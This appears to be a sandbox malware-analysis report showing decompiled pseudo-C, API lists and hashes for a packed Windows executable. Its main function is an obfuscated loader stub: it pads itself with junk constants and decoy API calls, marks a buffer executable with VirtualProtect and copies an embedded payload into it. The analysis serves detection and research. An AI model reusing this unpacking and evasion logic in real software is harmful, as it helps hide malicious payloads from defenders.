68 API calls 10370->10372 10371 410aa8 10371->10308 10371->10326 10375 40b97c 10371->10375 10372->10371 10373->10371 10374 413093 SetStdHandle 10373->10374 10374->10371 10481 413143 10375->10481 10377 40b98b 10378 40b9a1 SetFilePointer 10377->10378 10379 40b991 10377->10379 10381 40b9b8 GetLastError 10378->10381 10383 40b9c0 10378->10383 10380 407e97 __cftoe_l 68 API calls 10379->10380 10382 40b996 10380->10382 10381->10383 10382->10315 10382->10326 10383->10382 10384 407ebd __dosmaperr 68 API calls 10383->10384 10384->10382 10386 413143 __lseek_nolock 68 API calls 10385->10386 10389 414eec 10386->10389 10387 414f42 10390 4130bd __free_osfhnd 69 API calls 10387->10390 10388 414f20 10388->10387 10392 413143 __lseek_nolock 68 API calls 10388->10392 10389->10387 10389->10388 10391 413143 __lseek_nolock 68 API calls 10389->10391 10393 414f4a 10390->10393 10394 414f17 10391->10394 10395 414f2c CloseHandle 10392->10395 10396 414f6c 10393->10396 10399 407ebd __dosmaperr 68 API calls 10393->10399 10397 413143 __lseek_nolock 68 API calls 
10394->10397 10395->10387 10398 414f38 GetLastError 10395->10398 10396->10326 10397->10388 10398->10387 10399->10396 10494 40f63d 10400->10494 10403 407e97 __cftoe_l 68 API calls 10405 414db3 10403->10405 10404 40f63d __lseeki64_nolock 70 API calls 10406 414d61 10404->10406 10405->10326 10407 414e43 10406->10407 10408 414d87 GetProcessHeap HeapAlloc 10406->10408 10413 414da8 10406->10413 10409 414eac 10407->10409 10414 40f63d __lseeki64_nolock 70 API calls 10407->10414 10410 414da3 10408->10410 10420 414dba __setmode_nolock 10408->10420 10411 40f63d __lseeki64_nolock 70 API calls 10409->10411 10409->10413 10412 407e97 __cftoe_l 68 API calls 10410->10412 10411->10413 10412->10413 10413->10403 10413->10405 10415 414e5c 10414->10415 10415->10413 10416 413143 __lseek_nolock 68 API calls 10415->10416 10417 414e72 SetEndOfFile 10416->10417 10417->10409 10419 414e8f 10417->10419 10421 407e97 __cftoe_l 68 API calls 10419->10421 10422 414e26 10420->10422 10430 414dfd __setmode_nolock 10420->10430 10504 4127e4 10420->10504 10423 414e94 10421->10423 10424 407eaa __write_nolock 68 API calls 10422->10424 10425 407eaa __write_nolock 68 API calls 10423->10425 10427 414e2b 10424->10427 10426 414e9f GetLastError 10425->10426 10426->10409 10428 407e97 __cftoe_l 68 API calls 10427->10428 10427->10430 10428->10430 10429 414e0b GetProcessHeap HeapFree 10429->10409 10430->10429 10432 412f23 ___lock_fhandle 10431->10432 10433 412f46 10432->10433 10434 412f2b 10432->10434 10436 412f54 10433->10436 10439 412f95 10433->10439 10435 407eaa __write_nolock 68 API calls 10434->10435 10437 412f30 10435->10437 10438 407eaa __write_nolock 68 API calls 10436->10438 10440 407e97 __cftoe_l 68 API calls 10437->10440 10441 412f59 10438->10441 10442 4131ba ___lock_fhandle 69 API calls 10439->10442 10449 412f38 ___lock_fhandle 10440->10449 10443 407e97 __cftoe_l 68 API calls 10441->10443 10444 412f9b 10442->10444 10445 412f60 10443->10445 10447 412fa8 10444->10447 10448 412fbe 10444->10448 10446 406b09 
__cftoe_l 6 API calls 10445->10446 10446->10449 10450 4127e4 __write_nolock 100 API calls 10447->10450 10451 407e97 __cftoe_l 68 API calls 10448->10451 10449->10326 10452 412fb6 10450->10452 10453 412fc3 10451->10453 10563 412fe9 10452->10563 10454 407eaa __write_nolock 68 API calls 10453->10454 10454->10452 10457 413129 10456->10457 10458 4130ce 10456->10458 10459 407e97 __cftoe_l 68 API calls 10457->10459 10458->10457 10464 4130f9 10458->10464 10460 41312e 10459->10460 10461 407eaa __write_nolock 68 API calls 10460->10461 10462 41311f 10461->10462 10462->10320 10463 413119 SetStdHandle 10463->10462 10464->10462 10464->10463 10466 40e03d _doexit LeaveCriticalSection 10465->10466 10467 41335b 10466->10467 10467->10357 10469 4131c6 ___lock_fhandle 10468->10469 10470 413221 10469->10470 10471 40e117 __lock 68 API calls 10469->10471 10472 413226 EnterCriticalSection 10470->10472 10474 413243 ___lock_fhandle 10470->10474 10473 4131f2 10471->10473 10472->10474 10475 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 10473->10475 10477 413209 10473->10477 10474->10349 10475->10477 10476 413251 ___lock_fhandle LeaveCriticalSection 10476->10470 10477->10476 10479 40e03d _doexit LeaveCriticalSection 10478->10479 10480 413419 10479->10480 10480->10348 10482 413150 10481->10482 10483 413168 10481->10483 10484 407eaa __write_nolock 68 API calls 10482->10484 10486 407eaa __write_nolock 68 API calls 10483->10486 10493 4131ad 10483->10493 10485 413155 10484->10485 10487 407e97 __cftoe_l 68 API calls 10485->10487 10488 413196 10486->10488 10489 41315d 10487->10489 10490 407e97 __cftoe_l 68 API calls 10488->10490 10489->10377 10491 41319d 10490->10491 10492 406b09 __cftoe_l 6 API calls 10491->10492 10492->10493 10493->10377 10495 413143 __lseek_nolock 68 API calls 10494->10495 10496 40f65b 10495->10496 10497 40f663 10496->10497 10498 40f674 SetFilePointer 10496->10498 10499 407e97 __cftoe_l 68 API calls 10497->10499 10500 40f68c GetLastError 10498->10500 10501 40f668 
10498->10501 10499->10501 10500->10501 10502 40f696 10500->10502 10501->10404 10501->10413 10503 407ebd __dosmaperr 68 API calls 10502->10503 10503->10501 10505 4127f3 __write_nolock 10504->10505 10506 412825 10505->10506 10507 41284c 10505->10507 10537 41281a 10505->10537 10509 407eaa __write_nolock 68 API calls 10506->10509 10510 4128b4 10507->10510 10511 41288e 10507->10511 10508 407aab __atodbl_l 5 API calls 10512 412f15 10508->10512 10513 41282a 10509->10513 10515 4128c8 10510->10515 10519 40f63d __lseeki64_nolock 70 API calls 10510->10519 10514 407eaa __write_nolock 68 API calls 10511->10514 10512->10420 10516 407e97 __cftoe_l 68 API calls 10513->10516 10518 412893 10514->10518 10517 411667 __write_nolock 68 API calls 10515->10517 10520 412831 10516->10520 10522 4128d3 10517->10522 10523 407e97 __cftoe_l 68 API calls 10518->10523 10519->10515 10521 406b09 __cftoe_l 6 API calls 10520->10521 10521->10537 10524 412b79 10522->10524 10529 408bf1 __getptd 68 API calls 10522->10529 10525 41289c 10523->10525 10527 412b89 10524->10527 10528 412e48 WriteFile 10524->10528 10526 406b09 __cftoe_l 6 API calls 10525->10526 10526->10537 10530 412c67 10527->10530 10531 412b9d 10527->10531 10533 412e7b GetLastError 10528->10533 10555 412b5b 10528->10555 10532 4128ee GetConsoleMode 10529->10532 10553 412c76 10530->10553 10556 412d47 10530->10556 10534 412ec6 10531->10534 10543 412c0b WriteFile 10531->10543 10531->10555 10532->10524 10535 412919 10532->10535 10533->10555 10534->10537 10539 407e97 __cftoe_l 68 API calls 10534->10539 10535->10524 10536 41292b GetConsoleCP 10535->10536 10536->10555 10557 41294e 10536->10557 10537->10508 10538 412e99 10541 412ea4 10538->10541 10542 412eb8 10538->10542 10544 412ee9 10539->10544 10540 412dad WideCharToMultiByte 10540->10533 10547 412de4 WriteFile 10540->10547 10546 407e97 __cftoe_l 68 API calls 10541->10546 10549 407ebd __dosmaperr 68 API calls 10542->10549 10543->10531 10543->10533 10545 407eaa __write_nolock 68 API calls 

                    Control-flow Graph

                    C-Code - Quality: 70%
                    			E004059A0(long long __fp0) {
                    				struct _SECURITY_ATTRIBUTES* _v28;
                    				signed int _v36;
                    				void _v1112;
                    				struct _WIN32_FIND_DATAA _v1432;
                    				struct _TIME_ZONE_INFORMATION _v1612;
                    				struct _SECURITY_ATTRIBUTES* _v1616;
                    				intOrPtr _v1620;
                    				intOrPtr _v1624;
                    				intOrPtr _v1628;
                    				short _v1632;
                    				intOrPtr _v1636;
                    				intOrPtr _v1640;
                    				intOrPtr _v1644;
                    				intOrPtr _v1648;
                    				intOrPtr _v1652;
                    				intOrPtr _v1656;
                    				intOrPtr _v1660;
                    				intOrPtr _v1664;
                    				intOrPtr _v1668;
                    				intOrPtr _v1672;
                    				intOrPtr _v1676;
                    				intOrPtr _v1680;
                    				intOrPtr _v1684;
                    				intOrPtr _v1688;
                    				intOrPtr _v1692;
                    				intOrPtr _v1696;
                    				intOrPtr _v1700;
                    				intOrPtr _v1704;
                    				intOrPtr _v1708;
                    				intOrPtr _v1712;
                    				intOrPtr _v1716;
                    				intOrPtr _v1720;
                    				intOrPtr _v1724;
                    				intOrPtr _v1728;
                    				intOrPtr _v1732;
                    				intOrPtr _v1736;
                    				intOrPtr _v1740;
                    				intOrPtr _v1744;
                    				intOrPtr _v1748;
                    				intOrPtr _v1752;
                    				intOrPtr _v1756;
                    				intOrPtr _v1760;
                    				intOrPtr _v1764;
                    				intOrPtr _v1768;
                    				intOrPtr _v1772;
                    				intOrPtr _v1776;
                    				intOrPtr _v1780;
                    				intOrPtr _v1784;
                    				intOrPtr _v1788;
                    				intOrPtr _v1792;
                    				intOrPtr _v1796;
                    				intOrPtr _v1800;
                    				intOrPtr _v1804;
                    				intOrPtr _v1808;
                    				intOrPtr _v1812;
                    				intOrPtr _v1816;
                    				intOrPtr _v1820;
                    				intOrPtr _v1824;
                    				intOrPtr _v1828;
                    				intOrPtr _v1832;
                    				intOrPtr _v1836;
                    				intOrPtr _v1840;
                    				intOrPtr _v1844;
                    				intOrPtr _v1848;
                    				intOrPtr _v1852;
                    				intOrPtr _v1856;
                    				intOrPtr _v1860;
                    				intOrPtr _v1864;
                    				intOrPtr _v1868;
                    				intOrPtr _v1872;
                    				intOrPtr _v1876;
                    				intOrPtr _v1880;
                    				intOrPtr _v1884;
                    				intOrPtr _v1888;
                    				intOrPtr _v1892;
                    				intOrPtr _v1896;
                    				intOrPtr _v1900;
                    				intOrPtr _v1904;
                    				intOrPtr _v1908;
                    				intOrPtr _v1912;
                    				intOrPtr _v1916;
                    				intOrPtr _v1920;
                    				intOrPtr _v1924;
                    				intOrPtr _v1928;
                    				intOrPtr _v1936;
                    				long _v1948;
                    				long _v1952;
                    				char _v1956;
                    				intOrPtr _v1964;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t579;
                    				char _t581;
                    				struct HINSTANCE__* _t596;
                    				intOrPtr* _t609;
                    				intOrPtr* _t624;
                    				intOrPtr* _t626;
                    				intOrPtr* _t628;
                    				intOrPtr* _t631;
                    				intOrPtr* _t764;
                    				long _t770;
                    				long _t771;
                    				long _t772;
                    				void* _t774;
                    				void* _t778;
                    				struct _SECURITY_ATTRIBUTES* _t834;
                    				void* _t835;
                    				signed int _t840;
                    				signed int _t841;
                    				void* _t842;
                    				long long* _t845;
                    				intOrPtr* _t846;
                    				intOrPtr* _t847;
                    				long long _t869;
                    
                    				_t869 = __fp0;
                    				_t841 = _t840 & 0xffffffc0;
                    				_push(0xffffffff);
                    				_push(E0041802B);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t841;
                    				_t842 = _t841 - 0x7a8;
                    				E00405980();
                    				_t764 = __imp__GetGeoInfoA;
                    				_t834 = 0;
                    				while(1) {
                    					GetLastError();
                    					if(_t834 < 0x120723e) {
                    						_v1712 = 0x4e627021;
                    						_v1912 = 0x215b6660;
                    						_v1760 = 0x6e920e9b;
                    						_v1664 = 0x87d3fa0;
                    						_v1820 = 0x3a438c4f;
                    						_v1660 = 0x25908a53;
                    						_v1848 = 0x4f4b3cb4;
                    						_v1824 = 0x4024fb6f;
                    						_v1700 = 0x330756b8;
                    						_v1780 = 0x61da5a75;
                    						_v1876 = 0x25e7b9ba;
                    						_v1788 = 0x26b6ac0f;
                    						_v1636 = 0x376478e4;
                    						_v1640 = 0x5a58f071;
                    						_v1880 = 0x41f9f06d;
                    						_v1708 = 0x67b165ff;
                    						_v1668 = 0x424ff23e;
                    						_v1716 = 0x7ff6fa55;
                    						_v1924 = 0x53a124ed;
                    						_v1828 = 0x588436bd;
                    						_v1632 = 0x55cc7f95;
                    						_v1800 = 0x562ba11;
                    						_v1704 = 0x43b1fae2;
                    						_v1884 = 0x607a8146;
                    						_v1688 = 0x3c4d15ea;
                    						_v1864 = 0x1e181e91;
                    						_v1928 = 0x111b4c9f;
                    						_v1724 = 0x5b050ab5;
                    						_v1732 = 0x541bbf7b;
                    						_v1644 = 0x4a83859f;
                    						_v1796 = 0xd1aa2e5;
                    						_v1896 = 0x6cf29885;
                    						_v1920 = 0x75da6ba3;
                    						_v1752 = 0x4fb2c937;
                    						_v1676 = 0x2a09940f;
                    						_v1892 = 0x66a62aae;
                    						_v1740 = 0x2a8f2010;
                    						_v1804 = 0x334de827;
                    						_v1836 = 0x29b5f4b4;
                    						_v1844 = 0x3f6a5c30;
                    						_v1748 = 0x1f3d6e02;
                    						_v1832 = 0x794b22cc;
                    						_v1900 = 0x3e568168;
                    						_v1852 = 0x1dee1606;
                    						_v1684 = 0x2c7fea58;
                    						_v1768 = 0x6b81bbed;
                    						_v1720 = 0x64a41f37;
                    						_v1736 = 0x35729f65;
                    						_v1908 = 0x5aadb3a8;
                    						_v1756 = 0x6ea7f473;
                    						_v1872 = 0x6921ddf8;
                    						_v1860 = 0x769c5e44;
                    						_v1728 = 0x656fed79;
                    						_v1916 = 0x1378c832;
                    						_v1808 = 0x5d5bd4c;
                    						_v1856 = 0x75fd95ac;
                    						_v1776 = 0x1cc6260a;
                    						_v1692 = 0x3f40d0c;
                    						_v1936 = 0x7adaa56b;
                    						_v1648 = 0x57b008b4;
                    						_v1868 = 0x2700123d;
                    						_v1764 = 0x6dbcd40c;
                    						_v1772 = 0x5a90c04a;
                    						_v1904 = 0x3953d19f;
                    						_v1652 = 0x64e5d37a;
                    						_v1840 = 0x7ce1380e;
                    						_v1624 = 0x524dcf5b;
                    						_v1784 = 0x5951f7eb;
                    						_v1696 = 0x6955fa03;
                    						_v1656 = 0x500c476a;
                    						_v1628 = 0x4b3e0419;
                    						_v1680 = 0x1db8b113;
                    						_v1792 = 0x24eb64e4;
                    						_v1744 = 0x328a92be;
                    						_v1812 = 0x6a062f7d;
                    						_v1888 = 0x3ea350c2;
                    						_v1672 = 0x4bb851a;
                    						_v1816 = 0x4b8d9459;
                    						_v1620 = 0x38e35efd;
                    						_v1712 = _v1712 - 0x558fe6a4;
                    						_v1712 = _v1712 + 0x50ad1fda;
                    						_v1712 = _v1712 - 0x14676606;
                    						_v1712 = _v1712 - 0xde9941e;
                    						_v1664 = _v1664 + 0x530252b3;
                    						_v1912 = _v1912 - 0x5712fe58;
                    						_v1912 = _v1912 - 0x67656cad;
                    						_v1664 = _v1664 - 0x27701414;
                    						_v1700 = _v1700 - 0x2d7fdc66;
                    						_v1664 = _v1664 + 0xd927fd0;
                    						_v1824 = _v1824 + 0x1d62bd47;
                    						_v1712 = _v1712 - 0x413beb88;
                    						_v1820 = _v1820 + 0x4b1ba98c;
                    						_v1636 = _v1636 + 0x5714e824;
                    						_v1824 = _v1824 + 0x5991b917;
                    						_v1636 = _v1636 + 0xe416917;
                    						_v1848 = _v1848 + 0x7989dc34;
                    						_v1876 = _v1876 - 0x23cfc6eb;
                    						_v1848 = _v1848 + 0x2801ab16;
                    						_v1664 = _v1664 + 0x7484b53a;
                    						_v1636 = _v1636 + 0x749e9c07;
                    						_v1788 = _v1788 - 0x5457031;
                    						_v1700 = _v1700 + 0x7cef0def;
                    						_v1664 = _v1664 + 0x602337d4;
                    						_v1824 = _v1824 - 0x4db5aaa7;
                    						_v1712 = _v1712 - 0xd15d48d;
                    						_v1912 = _v1912 + 0x1195b0f0;
                    						_v1640 = _v1640 + 0x162f2481;
                    						_v1716 = _v1716 - 0x65b9b22d;
                    						_v1788 = _v1788 - 0x7301efd9;
                    						_v1632 = _v1632 + 0x27c78c9c;
                    						_v1924 = _v1924 - 0x59972a51;
                    						_v1884 = _v1884 - 0x19eb66c5;
                    						_v1732 = _v1732 + 0x4e89d140;
                    						_v1636 = _v1636 + 0x2e2119d1;
                    						_v1884 = _v1884 - 0x4e734c7a;
                    						_v1688 = _v1688 - 0x59bb6af3;
                    						_v1632 = _v1632 - 0x70f4c2b3;
                    						_v1660 = _v1660 + 0x2edb0761;
                    						_v1668 = _v1668 - 0x1923a94e;
                    						_v1824 = _v1824 - 0x2ef58b8a;
                    						_v1864 = _v1864 + 0x33dad1d;
                    						_v1636 = _v1636 + 0x5423c49b;
                    						_v1800 = _v1800 - 0x48abee08;
                    						_v1716 = _v1716 + 0x3d4e7d87;
                    						_v1848 = _v1848 + 0x26809a7f;
                    						_v1708 = _v1708 - 0x4b246d69;
                    						_v1668 = _v1668 + 0x20474bcf;
                    						_v1796 = _v1796 - 0x21c628b;
                    						_v1920 = _v1920 - 0x17c8788f;
                    						_v1676 = _v1676 + 0x16bd0599;
                    						_v1804 = _v1804 - 0x15f7270a;
                    						_v1708 = _v1708 - 0x21060fcb;
                    						_v1688 = _v1688 + 0xebdaa01;
                    						_v1848 = _v1848 + 0x1b52ee57;
                    						_v1796 = _v1796 + 0x5b2af0c1;
                    						_v1732 = _v1732 - 0x4db5b8c3;
                    						_v1752 = _v1752 + 0x6510af93;
                    						_v1736 = _v1736 + 0x52e0ddbf;
                    						_v1820 = _v1820 - 0x2bd2897c;
                    						_v1912 = _v1912 - 0x13112fb5;
                    						_v1676 = _v1676 + 0x6a13f381;
                    						_v1708 = _v1708 - 0x54dc36e9;
                    						_v1924 = _v1924 + 0x65426798;
                    						_v1896 = _v1896 - 0x690c2f07;
                    						_v1712 = _v1712 + 0x6ad6249;
                    						_v1768 = _v1768 + 0x5bec5851;
                    						_v1752 = _v1752 - 0x2acb6a31;
                    						_v1844 = _v1844 - 0x3d050de4;
                    						_v1716 = _v1716 - 0x3e2bbe5b;
                    						_v1912 = _v1912 + 0x37e10dd2;
                    						_v1720 = _v1720 + 0x660439a6;
                    						_v1836 = _v1836 + 0x43dcb1d8;
                    						_v1904 = _v1904 + 0x55a9d8d1;
                    						_v1768 = _v1768 + 0x3591dc23;
                    						_v1712 = _v1712 - 0x6ee3267;
                    						_v1864 = _v1864 + 0x191d88a6;
                    						_v1700 = _v1700 + 0x306bac8f;
                    					}
                    					 *_t764(0, 0, 0, 0, 0); // executed
                    					GetSystemDefaultLCID();
                    					if(_t834 > 0x11bb645) {
                    						break;
                    					}
                    					_t834 =  &(_t834->nLength);
                    					if(_t834 < 0x16f1a994) {
                    						continue;
                    					}
                    					break;
                    				}
                    				_t770 =  *0x47f7d4; // 0x5f7d0
                    				 *0x480144 =  *0x41dd4c;
                    				_t579 = GlobalAlloc(0, _t770);
                    				_t771 =  *0x47f7d4; // 0x5f7d0
                    				_t780 =  &_v1952;
                    				 *0x47f73c = _t579;
                    				VirtualProtect(_t579, _t771, 0x40,  &_v1952);
                    				_t853 =  *0x47f7d4 - 0x16;
                    				if( *0x47f7d4 == 0x16) {
                    					GetVersion();
                    					_t780 =  &_v1948;
                    					WriteConsoleW(0, 0, 0,  &_v1948, 0);
                    					GetLastError();
                    					HeapFree(0, 0, 0);
                    					SetConsoleCursorInfo(0, 0);
                    					FindNextFileA(0,  &_v1432);
                    					_v1612.Bias = 7;
                    					_v1616 = 0;
                    					_v1632 = 0;
                    					_v28 = 0;
                    					E00406BF3(0, 0);
                    					_push(0);
                    					E0040721E(_t764,  &_v1948, 0, _t834, _t853);
                    					asm("fldz");
                    					_t845 = _t842 + 4;
                    					asm("fst qword [esp+0x8]");
                    					 *_t845 = _t869;
                    					E00406730();
                    					_t846 = _t845 + 8;
                    					st0 = _t869;
                    					_t624 = _t846;
                    					 *_t624 = 0;
                    					 *((intOrPtr*)(_t624 + 4)) = 0;
                    					E00407300( &_v1948, 0);
                    					st0 = _t869;
                    					_t626 = _t846;
                    					 *_t626 = 0;
                    					 *((intOrPtr*)(_t626 + 4)) = 0;
                    					E00406870();
                    					st0 = _t869;
                    					_t628 = _t846;
                    					 *_t628 = 0;
                    					 *((intOrPtr*)(_t628 + 4)) = 0;
                    					E00406D40();
                    					st0 = _t869;
                    					E00407035(_t764, _t780, 0, _t834, _t853);
                    					_t847 = _t846 + 4;
                    					_t631 = _t847;
                    					 *_t631 = 0;
                    					 *((intOrPtr*)(_t631 + 4)) = 0;
                    					E00406E70(0, 0);
                    					st0 = _t869;
                    					_t842 = _t847 + 8;
                    					_v28 = 0xffffffff;
                    					if(_v1612.Bias >= 8) {
                    						_t780 = _v1632;
                    						E00406D26(_v1632);
                    						_t842 = _t842 + 4;
                    					}
                    				}
                    				_t772 =  *0x47f7d4; // 0x5f7d0
                    				_t855 = _t772 - 0xc;
                    				if(_t772 == 0xc) {
                    					FoldStringA(0, "cadavafofufeniyi", 0,  &_v1112, 0);
                    					E00406744(0);
                    					E0040698D(0, 0);
                    					_t609 = _t842 + 4;
                    					 *_t609 = 0;
                    					 *((intOrPtr*)(_t609 + 4)) = 0;
                    					E00406E70();
                    					st0 = _t869;
                    					_push(0);
                    					_push(0);
                    					E00406C0A(_t764, _t780, 0, _t834, _t855);
                    					E0040701F(0);
                    					E00406F8A();
                    				}
                    				_t835 = 0;
                    				if(_t772 <= 0) {
                    					L15:
                    					_t581 = 0;
                    					_v1956 = 0;
                    					L17:
                    					L17:
                    					if(_t772 + _t581 == 0x5e) {
                    						ConvertFiberToThread();
                    						SetFileAttributesW(L"zusunabigiv", 0);
                    						AddAtomA("cefiw");
                    						__imp__SetFileShortNameW(0, 0);
                    						_t581 = _v1964;
                    					}
                    					_t581 = _t581 + 1;
                    					_v1956 = _t581;
                    					if(_t581 < 0x40c893) {
                    						goto L16;
                    					}
                    					E00405800();
                    					_t774 = 0;
                    					do {
                    						if(_t774 == 0x770e) {
                    							E00405960(_t774);
                    						}
                    						_t774 = _t774 + 1;
                    					} while (_t774 < 0x286b97d);
                    					_v1956 = 0x7b;
                    					do {
                    						if( *0x47f7d4 == 0xd) {
                    							GetFileAttributesExW(L"tavehidinavonerumotevevigirihezikedevavebuhilo", 0,  &_v1112);
                    							GetFileType(0);
                    							LocalAlloc(0, 0);
                    							WritePrivateProfileStringA(0, 0, 0, 0);
                    							DeregisterEventSource(0);
                    						}
                    						if( *0x47f7d4 == 0xf) {
                    							__imp__GetConsoleAliasA(0,  &_v1112, 0, 0);
                    						}
                    						_t566 =  &_v1956;
                    						 *_t566 = _v1956 - 1;
                    					} while ( *_t566 != 0);
                    					_v1956 = 0x184cc;
                    					do {
                    						if( *0x47f7d4 == 0x1833b) {
                    							FindFirstChangeNotificationA("Bemolufekagegok", 0, 0);
                    							GetFileAttributesA(0);
                    							SetComputerNameA("witupadivelisitolihesemawakeloy");
                    							__imp__SetThreadExecutionState(0);
                    							TlsGetValue(0);
                    							SetTimeZoneInformation( &_v1612);
                    							GetFileAttributesW(L"heweyidocemuvikezalagecu");
                    							__imp__SetFileShortNameA(0, "Ziyezetuninanur tepar kekoxirolapugey");
                    						}
                    						_t570 =  &_v1956;
                    						 *_t570 = _v1956 - 1;
                    					} while ( *_t570 != 0);
                    					_t596 = LoadLibraryA("msimg32.dll");
                    					 *[fs:0x0] = _v36;
                    					return _t596;
                    					L16:
                    					_t772 =  *0x47f7d4; // 0x5f7d0
                    					goto L17;
                    				} else {
                    					do {
                    						_v1956 =  *0x480144;
                    						_v1956 = _v1956 + 0xb2d3b;
                    						_t778 =  *0x47f73c; // 0x0
                    						 *((char*)(_t835 + _t778)) =  *((intOrPtr*)(_v1956 + _t835));
                    						if( *0x47f7d4 == 0x44) {
                    							LocalAlloc(0, 0);
                    							GetBinaryTypeW(0,  &_v1948);
                    							CreateMutexA(0, 0, 0);
                    						}
                    						_t772 =  *0x47f7d4; // 0x5f7d0
                    						_t835 = _t835 + 1;
                    					} while (_t835 < _t772);
                    					goto L15;
                    				}
                    			}

                    APIs
                    • GetLastError.KERNEL32 ref: 004059D3
                    • GetGeoInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00406347
                    • GetSystemDefaultLCID.KERNEL32 ref: 00406349
                    • GlobalAlloc.KERNEL32(00000000,0005F7D0), ref: 00406376
                    • VirtualProtect.KERNEL32(00000000,0005F7D0,00000040,?), ref: 00406390
                    • GetVersion.KERNEL32 ref: 004063A3
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004063B2
                    • GetLastError.KERNEL32 ref: 004063B8
                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 004063C1
                    • SetConsoleCursorInfo.KERNEL32(00000000,00000000), ref: 004063C9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 004063D8
                    • _fseek.LIBCMT ref: 0040640B
                    • __floor_pentium4.LIBCMT ref: 0040643B
                    • __floor_pentium4.LIBCMT ref: 00406449
                    • _puts.LIBCMT ref: 00406451
                    • FoldStringA.KERNEL32(00000000,cadavafofufeniyi,00000000,?,00000000), ref: 004064AA
                    • _feof.LIBCMT ref: 004064B1
                    • _fsetpos.LIBCMT ref: 004064BB
                    • _fprintf.LIBCMT ref: 004064D0
                      • Part of subcall function 0040701F: __wcstoi64.LIBCMT ref: 0040702B
                      • Part of subcall function 00406F8A: __getptd.LIBCMT ref: 00406F96
                      • Part of subcall function 00406F8A: _abort.LIBCMT ref: 00406FB8
                    • LocalAlloc.KERNEL32(00000000,00000000), ref: 0040651E
                    • GetBinaryTypeW.KERNEL32(00000000,?), ref: 0040652A
                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0040652F
                    • ConvertFiberToThread.KERNEL32 ref: 0040656D
                    • SetFileAttributesW.KERNEL32(zusunabigiv,00000000), ref: 00406576
                    • AddAtomA.KERNEL32 ref: 0040657D
                    • SetFileShortNameW.KERNEL32(00000000,00000000), ref: 00406583
                    • GetFileAttributesExW.KERNEL32(tavehidinavonerumotevevigirihezikedevavebuhilo,00000000,?), ref: 004065E8
                    • GetFileType.KERNEL32(00000000), ref: 004065EC
                    • LocalAlloc.KERNEL32(00000000,00000000), ref: 004065F2
                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00406600
                    • DeregisterEventSource.ADVAPI32(00000000), ref: 00406604
                    • GetConsoleAliasA.KERNEL32(00000000,?,00000000,00000000), ref: 00406621
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: File$AllocConsole$AttributesErrorInfoLastLocalStringTypeWrite__floor_pentium4$AliasAtomBinaryConvertCreateCursorDefaultDeregisterEventFiberFindFoldFreeGlobalHeapMutexNameNextPrivateProfileProtectShortSourceSystemThreadVersionVirtual__getptd__wcstoi64_abort_feof_fprintf_fseek_fsetpos_puts
                    • String ID: !pbN$&#p,$'M3$0\j?$Bemolufekagegok$QX[$Sn&$V!tc$ZCBe$Ziyezetuninanur tepar kekoxirolapugey$`f[!$cadavafofufeniyi$cefiw$heweyidocemuvikezalagecu$im$K$msimg32.dll$tavehidinavonerumotevevigirihezikedevavebuhilo$witupadivelisitolihesemawakeloy$w3$yoe$zLsN$zusunabigiv${$|$d$$xd7
                    • API String ID: 1543215214-1725507697
                    • Opcode ID: 31b892f1b1e2f5dbd9b73dc91cab596856a1f5243eff4b599b9f42058fe2f840
                    • Instruction ID: 5dc258c7044e7f3c7e2f74ce0e13a03e81a2acf7cec3cc4318438fad21ef302c
                    • Opcode Fuzzy Hash: 31b892f1b1e2f5dbd9b73dc91cab596856a1f5243eff4b599b9f42058fe2f840
                    • Instruction Fuzzy Hash: DF5221B5608380DFC2748F56D98AB9FB7F4FB85704F40882DE68A5A660C7749884CF5B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 69 40ce1f-40ce41 HeapCreate 70 40ce43-40ce44 69->70 71 40ce45-40ce4e 69->71
                    C-Code - Quality: 100%
                    			E0040CE1F(intOrPtr _a4) {
                    				void* _t6;
                    
                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                    				 *0x47ef44 = _t6;
                    				if(_t6 != 0) {
                    					 *0x480164 = 1;
                    					return 1;
                    				} else {
                    					return _t6;
                    				}
                    			}

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040CE34
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: CreateHeap
                    • String ID:
                    • API String ID: 10892065-0
                    • Opcode ID: a4a0a6336ea97a9031573e920964d2cb6ee1247d9aef2f4727136763679d05ab
                    • Instruction ID: b83782b3064b2fa160c0ab102a9f44b4b2381b4b853f59d27647a978661f5c34
                    • Opcode Fuzzy Hash: a4a0a6336ea97a9031573e920964d2cb6ee1247d9aef2f4727136763679d05ab
